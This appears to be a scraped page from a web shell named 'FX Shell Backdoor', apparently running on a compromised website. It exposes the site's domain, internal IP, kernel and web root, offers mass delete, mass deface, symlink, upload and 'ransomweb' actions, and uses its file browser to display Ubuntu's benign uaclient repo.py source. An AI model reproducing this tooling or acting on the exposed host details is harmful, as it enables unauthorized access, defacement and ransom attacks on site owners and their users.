FX Shell Backdoor
Home
Tools
Mass Delete
Mass Deface
Symlink
About
Website : vivehg.com
Ip Address : 172.31.2.149
Port : 443
Kernel : Linux 52-72-122-155.cprapid.com 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 06:59:36 UTC 2025 x86_64
Protokol : HTTP/1.1
Save Data :
Koneksi :
Server : Apache
Root : /home/vivehg/public_html
G-Interface : CGI/1.1
R-Method : GET
Browser : Lainnya
Version Shell : 1.0 (Release candidate)
Author : FierzaXploit/Mr.MF33
Type
Name
options
PATH :
/
lib
/
python3
/
dist-packages
/
uaclient
/
entitlements
/
Upload
Buat File
Buat Folder
Buat Ransomweb
import abc import copy import logging import re from os.path import exists from typing import Any, Dict, List, Optional, Tuple, Union from uaclient import ( apt, contract, event_logger, exceptions, http, messages, system, util, ) from uaclient.entitlements import base from uaclient.entitlements.entitlement_status import ApplicationStatus event = event_logger.get_event_logger() LOG = logging.getLogger(util.replace_top_level_logger_name(__name__)) class RepoEntitlement(base.UAEntitlement): repo_list_file_tmpl = "/etc/apt/sources.list.d/ubuntu-{name}.list" repo_pref_file_tmpl = "/etc/apt/preferences.d/ubuntu-{name}" repo_url_tmpl = "{}/ubuntu" # The repo Origin value for setting pinning origin = None # type: Optional[str] # GH: #1084 call apt in noninteractive mode apt_noninteractive = False # Check if the requested packages are installed to inform if # the service is enabled or not check_packages_are_installed = False # Optional repo pin priority in subclass @property def repo_pin_priority(self) -> Union[int, str, None]: return None @property def packages(self) -> List[str]: """debs to install on enablement""" packages = [] entitlement = self.entitlement_cfg.get("entitlement", {}) if entitlement: directives = entitlement.get("directives", {}) additional_packages = copy.copy( directives.get("additionalPackages", []) ) packages = additional_packages return packages def _check_for_reboot(self) -> bool: """Check if system needs to be rebooted.""" reboot_required = system.should_reboot( installed_pkgs=set(self.packages) ) event.needs_reboot(reboot_required) return reboot_required @property @abc.abstractmethod def repo_key_file(self) -> str: pass def _perform_enable(self, silent: bool = False) -> bool: """Enable specific entitlement. @return: True on success, False otherwise. @raises: UserFacingError on failure to install suggested packages """ self.setup_apt_config(silent=silent) if self.supports_access_only and self.access_only: packages_str = ( ": " + " ".join(self.packages) if len(self.packages) > 0 else "" ) event.info("Skipping installing packages{}".format(packages_str)) event.info(messages.ACCESS_ENABLED_TMPL.format(title=self.title)) else: self.install_packages() event.info(messages.ENABLED_TMPL.format(title=self.title)) self._check_for_reboot_msg(operation="install") return True def _perform_disable(self, silent=False): if hasattr(self, "remove_packages"): self.remove_packages() self.remove_apt_config(silent=silent) return True def application_status( self, ) -> Tuple[ApplicationStatus, Optional[messages.NamedMessage]]: current_status = ( ApplicationStatus.DISABLED, messages.SERVICE_NOT_CONFIGURED.format(title=self.title), ) entitlement_cfg = self.entitlement_cfg directives = entitlement_cfg.get("entitlement", {}).get( "directives", {} ) repo_url = directives.get("aptURL") if not repo_url: return ( ApplicationStatus.DISABLED, messages.NO_APT_URL_FOR_SERVICE.format(title=self.title), ) policy = apt.get_apt_cache_policy( error_msg=messages.APT_POLICY_FAILED.msg ) match = re.search(self.repo_url_tmpl.format(repo_url), policy) if match: current_status = ( ApplicationStatus.ENABLED, messages.SERVICE_IS_ACTIVE.format(title=self.title), ) if self.check_packages_are_installed: for package in self.packages: if not apt.is_installed(package): return ( ApplicationStatus.DISABLED, messages.SERVICE_DISABLED_MISSING_PACKAGE.format( service=self.name, package=package ), ) return current_status def _check_apt_url_is_applied(self, apt_url): """Check if apt url delta should be applied. :param apt_url: string containing the apt url to be used. :return: False if apt url is already found on the source file. True otherwise. """ apt_file = self.repo_list_file_tmpl.format(name=self.name) # If the apt file is commented out, we will assume that we need # to regenerate the apt file, regardless of the apt url delta if all( line.startswith("#") for line in system.load_file(apt_file).strip().split("\n") ): return False # If the file is not commented out and we don't have delta, # we will not do anything if not apt_url: return True # If the delta is already in the file, we won't reconfigure it # again return bool(apt_url in system.load_file(apt_file)) def process_contract_deltas( self, orig_access: Dict[str, Any], deltas: Dict[str, Any], allow_enable: bool = False, ) -> bool: """Process any contract access deltas for this entitlement. :param orig_access: Dictionary containing the original resourceEntitlement access details. :param deltas: Dictionary which contains only the changed access keys and values. :param allow_enable: Boolean set True if allowed to perform the enable operation. When False, a message will be logged to inform the user about the recommended enabled service. :return: True when delta operations are processed; False when noop. """ if super().process_contract_deltas(orig_access, deltas, allow_enable): return True # Already processed parent class deltas delta_entitlement = deltas.get("entitlement", {}) delta_directives = delta_entitlement.get("directives", {}) delta_apt_url = delta_directives.get("aptURL") delta_packages = delta_directives.get("additionalPackages") status_cache = self.cfg.read_cache("status-cache") if delta_directives and status_cache: application_status = self._check_application_status_on_cache() else: application_status, _ = self.application_status() if application_status == ApplicationStatus.DISABLED: return False if not self._check_apt_url_is_applied(delta_apt_url): LOG.info( "Updating '%s' apt sources list on changed directives.", self.name, ) orig_entitlement = orig_access.get("entitlement", {}) old_url = orig_entitlement.get("directives", {}).get("aptURL") if old_url: # Remove original aptURL and auth and rewrite repo_filename = self.repo_list_file_tmpl.format(name=self.name) apt.remove_auth_apt_repo(repo_filename, old_url) self.remove_apt_config() self.setup_apt_config() if delta_packages: LOG.info( "Installing packages on changed directives: {}".format( ", ".join(delta_packages) ) ) self.install_packages(package_list=delta_packages) return True def install_packages( self, package_list: Optional[List[str]] = None, cleanup_on_failure: bool = True, verbose: bool = True, ) -> None: """Install contract recommended packages for the entitlement. :param package_list: Optional package list to use instead of self.packages. :param cleanup_on_failure: Cleanup apt files if apt install fails. :param verbose: If true, print messages to stdout """ if not package_list: package_list = self.packages if not package_list: return msg_ops = self.messaging.get("pre_install", []) if not util.handle_message_operations(msg_ops): return if verbose: event.info("Installing {title} packages".format(title=self.title)) if self.apt_noninteractive: override_env_vars = {"DEBIAN_FRONTEND": "noninteractive"} apt_options = [ "--allow-downgrades", '-o Dpkg::Options::="--force-confdef"', '-o Dpkg::Options::="--force-confold"', ] else: override_env_vars = None apt_options = [] try: msg = messages.ENABLED_FAILED.format(title=self.title) apt.run_apt_install_command( packages=package_list, apt_options=apt_options, error_msg=msg.msg, override_env_vars=override_env_vars, ) except exceptions.UserFacingError: if cleanup_on_failure: self.remove_apt_config() raise def setup_apt_config(self, silent: bool = False) -> None: """Setup apt config based on the resourceToken and directives. Also sets up apt proxy if necessary. :raise UserFacingError: on failure to setup any aspect of this apt configuration """ http_proxy = None # type: Optional[str] https_proxy = None # type: Optional[str] scope = None # type: Optional[apt.AptProxyScope] if self.cfg.global_apt_http_proxy or self.cfg.global_apt_https_proxy: http_proxy = http.validate_proxy( "http", self.cfg.global_apt_http_proxy, http.PROXY_VALIDATION_APT_HTTP_URL, ) https_proxy = http.validate_proxy( "https", self.cfg.global_apt_https_proxy, http.PROXY_VALIDATION_APT_HTTPS_URL, ) scope = apt.AptProxyScope.GLOBAL elif self.cfg.ua_apt_http_proxy or self.cfg.ua_apt_https_proxy: http_proxy = http.validate_proxy( "http", self.cfg.ua_apt_http_proxy, http.PROXY_VALIDATION_APT_HTTP_URL, ) https_proxy = http.validate_proxy( "https", self.cfg.ua_apt_https_proxy, http.PROXY_VALIDATION_APT_HTTPS_URL, ) scope = apt.AptProxyScope.UACLIENT apt.setup_apt_proxy( http_proxy=http_proxy, https_proxy=https_proxy, proxy_scope=scope ) repo_filename = self.repo_list_file_tmpl.format(name=self.name) resource_cfg = self.entitlement_cfg directives = resource_cfg["entitlement"].get("directives", {}) obligations = resource_cfg["entitlement"].get("obligations", {}) token = resource_cfg.get("resourceToken") if not token: machine_token = self.cfg.machine_token["machineToken"] if not obligations.get("enableByDefault"): # services that are not enableByDefault need to obtain specific # resource access for tokens. We want to refresh this every # enable call because it is not refreshed by `pro refresh`. client = contract.UAContractClient(self.cfg) machine_access = client.get_resource_machine_access( machine_token, self.name ) if machine_access: token = machine_access.get("resourceToken") if not token: token = machine_token LOG.warning( "No resourceToken present in contract for service %s." " Using machine token as credentials", self.title, ) aptKey = directives.get("aptKey") if not aptKey: raise exceptions.UserFacingError( "Ubuntu Pro server provided no aptKey directive for" " {}.".format(self.name) ) repo_url = directives.get("aptURL") if not repo_url: raise exceptions.MissingAptURLDirective(self.name) repo_suites = directives.get("suites") if not repo_suites: raise exceptions.UserFacingError( "Empty {} apt suites directive from {}".format( self.name, self.cfg.contract_url ) ) if self.repo_pin_priority: if not self.origin: raise exceptions.UserFacingError( "Cannot setup apt pin. Empty apt repo origin value '{}'.\n" "{}".format( self.origin, messages.ENABLED_FAILED.format(title=self.title).msg, ) ) repo_pref_file = self.repo_pref_file_tmpl.format(name=self.name) apt.add_ppa_pinning( repo_pref_file, repo_url, self.origin, self.repo_pin_priority, ) prerequisite_pkgs = [] if not exists(apt.APT_METHOD_HTTPS_FILE): prerequisite_pkgs.append("apt-transport-https") if not exists(apt.CA_CERTIFICATES_FILE): prerequisite_pkgs.append("ca-certificates") if prerequisite_pkgs: if not silent: event.info( "Installing prerequisites: {}".format( ", ".join(prerequisite_pkgs) ) ) try: apt.run_apt_install_command(packages=prerequisite_pkgs) except exceptions.UserFacingError: self.remove_apt_config() raise apt.add_auth_apt_repo( repo_filename, self.repo_url_tmpl.format(repo_url), token, repo_suites, self.repo_key_file, ) # Run apt-update on any repo-entitlement enable because the machine # probably wants access to the repo that was just enabled. # Side-effect is that apt policy will now report the repo as accessible # which allows pro status to report correct info if not silent: event.info(messages.APT_UPDATING_LISTS) try: apt.run_apt_update_command() except exceptions.UserFacingError: self.remove_apt_config(run_apt_update=False) raise def remove_apt_config( self, run_apt_update: bool = True, silent: bool = False ): """Remove any repository apt configuration files. :param run_apt_update: If after removing the apt update command after removing the apt files. """ series = system.get_release_info().series repo_filename = self.repo_list_file_tmpl.format(name=self.name) entitlement = self.cfg.machine_token_file.entitlements[self.name].get( "entitlement", {} ) access_directives = entitlement.get("directives", {}) repo_url = access_directives.get("aptURL") if not repo_url: raise exceptions.MissingAptURLDirective(self.name) apt.remove_auth_apt_repo(repo_filename, repo_url, self.repo_key_file) apt.remove_apt_list_files(repo_url, series) if self.repo_pin_priority: repo_pref_file = self.repo_pref_file_tmpl.format(name=self.name) system.ensure_file_absent(repo_pref_file) if run_apt_update: if not silent: event.info(messages.APT_UPDATING_LISTS) apt.run_apt_update_command()
__pycache__
Choose...
Rename
Delete
Now
__init__.py
Choose...
Edit
Rename
Delete
Now
__pycache__
Choose...
Edit
Rename
Delete
Now
anbox.py
Choose...
Edit
Rename
Delete
Now
base.py
Choose...
Edit
Rename
Delete
Now
cc.py
Choose...
Edit
Rename
Delete
Now
cis.py
Choose...
Edit
Rename
Delete
Now
entitlement_status.py
Choose...
Edit
Rename
Delete
Now
esm.py
Choose...
Edit
Rename
Delete
Now
fips.py
Choose...
Edit
Rename
Delete
Now
landscape.py
Choose...
Edit
Rename
Delete
Now
livepatch.py
Choose...
Edit
Rename
Delete
Now
realtime.py
Choose...
Edit
Rename
Delete
Now
repo.py
Choose...
Edit
Rename
Delete
Now
ros.py
Choose...
Edit
Rename
Delete
Now